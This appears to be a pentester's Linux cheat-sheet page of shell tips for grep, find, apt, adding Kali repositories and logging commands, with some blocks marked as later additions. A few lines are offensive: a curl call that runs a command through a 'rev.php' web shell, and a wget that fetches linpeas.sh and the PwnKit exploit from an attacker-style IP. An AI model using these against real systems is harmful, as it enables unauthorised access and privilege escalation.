Linux

Last updated 2 years ago

Download Linux Image

  • The mirror link https://kali.download/base-images/ is faster than the official download URL

Interactive SSH Prompt

~C
# typed at the start of a line (press Enter first); brings up the ssh> prompt, which can be used for port forwarding (only after obtaining a shell)

URL Encode via curl

  • URL Encode the values requested via curl

curl -G http://url/rev.php --data-urlencode "cmd=/bin/bash -c 'whoami'"

Wget

  • Wget multiple files with bash brace expansion

wget http://10.10.14.29/{linpeas.sh,PwnKit}

Chmod

  • Chmod multiple files

# files that need chmod +x: linpeas.sh and PwnKit
chmod +x [lP]*

Grep

  • Exclude lines that match any of several patterns

grep -Ev '(str1|str2)'

  • Grep for multiple patterns (no spaces around |, otherwise the spaces become part of the pattern)

grep -EInRi --color=always '(str1|str2)'
  • Keep the grep highlighted color when piping the output

grep --color=always dnoscp whoami.txt | more

Find

  • Exclude specific directories from the find command

find / -writable ! -path '/proc/*' 2>/dev/null
  • Find files with multiple extensions

find . -type f \( -name "*.txt" -o -name "*.xml" \)

fzf

  • Install fzf

sudo apt install fzf
  • Make fzf interpret the ANSI colors

grep --color=always dnoscp whoami.txt | fzf --ansi

Files

  • Find where a service's files are located without installing the application

sudo apt install apt-file
sudo apt-file update # fetch the package contents index before the first search
apt-file search tomcat # lists all files related to tomcat, i.e. every packaged file whose path contains the string tomcat

apt

  • Change the default repository for higher speed

# File: /etc/apt/sources.list
# From: deb http://http.kali.org/kali kali-rolling main contrib non-free
# To: deb http://kali.download/kali kali-rolling main contrib non-free

┌──(dnoscp㉿friday)-[~]
└─$ cat /etc/apt/sources.list
# See https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/
# deb http://http.kali.org/kali kali-rolling main contrib non-free
deb http://kali.download/kali kali-rolling main contrib non-free

# Additional line for source packages
# deb-src http://http.kali.org/kali kali-rolling main contrib non-free
                                                                         
  • Know the version of the application installed from apt with apt-cache policy <packageName>

➜  dhanesh's-device apt-cache policy sudo
sudo:
  Installed: 1.8.31-1ubuntu1.2
  Candidate: 1.8.31-1ubuntu1.2
  Version table:
 *** 1.8.31-1ubuntu1.2 500
        500 http://in.archive.ubuntu.com/ubuntu focal-updates/main amd64 Packages
        500 http://security.ubuntu.com/ubuntu focal-security/main amd64 Packages
        100 /var/lib/dpkg/status
     1.8.31-1ubuntu1 500
        500 http://in.archive.ubuntu.com/ubuntu focal/main amd64 Packages
        500 http://archive.ubuntu.com/ubuntu focal/main amd64 Packages
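
# sign the kali release (apt-key needs root and "-" to read the key from stdin; apt-key is deprecated on current apt releases)
wget -q -O - https://archive.kali.org/archive-key.asc | sudo apt-key add -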

# add the repo
echo "deb http://kali.download/kali kali-rolling main contrib non-free" | sudo tee -a /etc/apt/sources.list
sudo apt update
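
An alternative to the `apt-key add` step above, as an added example that is not from the original page: the key is kept in its own keyring and bound to the Kali entry with `signed-by`, and a pin keeps Ubuntu's packages preferred. The keyring path, the file names `kali.list` and `kali`, and the function names are assumptions.

```shell
# Assumed keyring location; any root-owned path outside the global trust store works.
KALI_KEYRING=/usr/share/keyrings/kali-archive-keyring.gpg

# Fetch the archive key and store it de-armored in a dedicated keyring,
# so it is trusted for the Kali entry only. Needs root and network access.
fetch_kali_key() {
    wget -q -O - https://archive.kali.org/archive-key.asc \
        | gpg --dearmor | sudo tee "$KALI_KEYRING" >/dev/null
}

# Write the repository entry and the pin below ROOT (first argument, default /).
# Run as root when ROOT is /; pass a scratch directory to inspect the result first.
write_kali_apt_config() {
    root="${1:-}"
    mkdir -p "$root/etc/apt/sources.list.d" "$root/etc/apt/preferences.d" || return 1

    # signed-by limits which key may sign this repository's Release file
    echo "deb [signed-by=$KALI_KEYRING] http://kali.download/kali kali-rolling main contrib non-free" \
        > "$root/etc/apt/sources.list.d/kali.list"

    # Priority 100 is below the default 500, so Ubuntu's own version wins
    # whenever both repositories carry the same package.
    cat > "$root/etc/apt/preferences.d/kali" <<EOF
Package: *
Pin: origin "kali.download"
Pin-Priority: 100
EOF
}
```

After `fetch_kali_key` and `write_kali_apt_config`, `sudo apt update` followed by `apt-cache policy <packageName>` shows which repository each candidate version comes from.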

Log things you have installed

  • Add one of the following functions to the .bashrc file

install(){
        # note: this function shadows /usr/bin/install in the interactive shell
        # log the command first, then run it
        echo "sudo apt install -y $*" | tee -a ~/commands.txt
        sudo apt install -y "$@"
}

# OR

install(){
        # installation part: pass the arguments straight to apt instead of piping a string to bash
        sudo apt install -y "$@"
        ISTATUS=$?

        # logging part
        mkdir -p ~/commands
        if [ "$ISTATUS" -eq 0 ]; then
                echo "sudo apt install -y $*" >> ~/commands/install.txt
        else
                echo "[-] Installation Error: $*" >> ~/commands/failed.txt
        fi
}

  • Source the file and install new packages with install <packageName> (install xclip)

  • All the install commands will be available in ~/commands/install.txt (the first variant logs to ~/commands.txt instead)

Log only commands that executed successfully

  • Add the following to the .bashrc file

a(){
        cmd="$*"
        # run the command line in a child bash; stderr is discarded
        bash -c "$cmd" 2>/dev/null
        status=$?

        if [ "$status" -eq 0 ]; then
                echo "$cmd" >> ~/successcommands.txt
        else
                echo "[-] Command failed or not found (exit $status): $cmd"
        fi
}

  • Execute commands with a <command> (a whoami)

  • Only the commands that return a successful status code are logged in the ~/successcommands.txt file

Date

  • Date format with full date and time: date +%F:%T (Mostly used with somecommand | tee $(date +%F:%T).log)
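
The two logging ideas above (record only successful commands, keep output in a timestamped `tee` log) combined, as an added example that is not from the original page; the function name `logrun` and the `LOGDIR` location are assumptions. It preserves the command's own exit status, which a plain `somecommand | tee file` pipeline replaces with the status of `tee`.

```shell
# Assumed log location; override by exporting LOGDIR before calling logrun.
LOGDIR="${LOGDIR:-$HOME/cmdlogs}"

logrun() {
    mkdir -p "$LOGDIR" || return 1
    # Colon-free timestamp for the file name: ':' is awkward for scp/rsync
    # targets and is not allowed on Windows shares.
    _out="$LOGDIR/$(date +%F_%H%M%S).log"
    _st="$LOGDIR/.status.$$"

    # The pipeline returns tee's status, so the command's status is written
    # to a file inside the pipeline and read back afterwards.
    # "$@" keeps the caller's quoting; nothing is re-parsed by a second shell.
    { _rc=0; "$@" 2>&1 || _rc=$?; echo "$_rc" > "$_st"; } | tee -a "$_out"
    _rc=$(cat "$_st")
    rm -f "$_st"

    if [ "$_rc" -eq 0 ]; then
        printf '%s\t%s\n' "$(date +%F:%T)" "$*" >> "$LOGDIR/success.txt"
    else
        printf '%s\trc=%s\t%s\n' "$(date +%F:%T)" "$_rc" "$*" >> "$LOGDIR/failed.txt"
    fi
    return "$_rc"
}
```

Used as `logrun grep -R str1 .`; the logs hold full command lines and output in plain text, so keep `LOGDIR` readable by your own user only.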

Add Kali Linux releases in Ubuntu (might be slow when installing packages, and the stability is unknown)

https://kali.download/base-images/
tomcat-users.xml default location